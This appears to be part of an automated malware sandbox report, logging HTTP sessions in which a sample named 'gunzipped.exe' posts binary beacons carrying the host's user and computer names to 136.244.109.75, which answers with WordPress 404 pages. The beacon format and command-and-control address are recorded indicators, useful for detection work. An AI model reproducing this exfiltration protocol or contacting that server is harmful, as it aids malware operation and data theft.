Apr 17, 2024 03:17:14.294159889 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:14.294198990 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:14.294240952 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:14.294282913 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:14.294322968 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:14.294363976 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:14.294404030 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49727	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:14.663281918 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:14.871156931 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:15.817419052 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:14 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:15.817534924 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:15.817575932 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:15.817615986 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:15.817656040 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:15.817698956 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:15.817739964 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:15.817778111 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:15.817816019 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:15.817853928 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49728	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:16.164911985 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:16.368056059 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:17.295049906 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:16 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:17.295114040 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:17.295152903 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:17.295191050 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:17.295233965 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:17.295270920 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:17.295309067 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
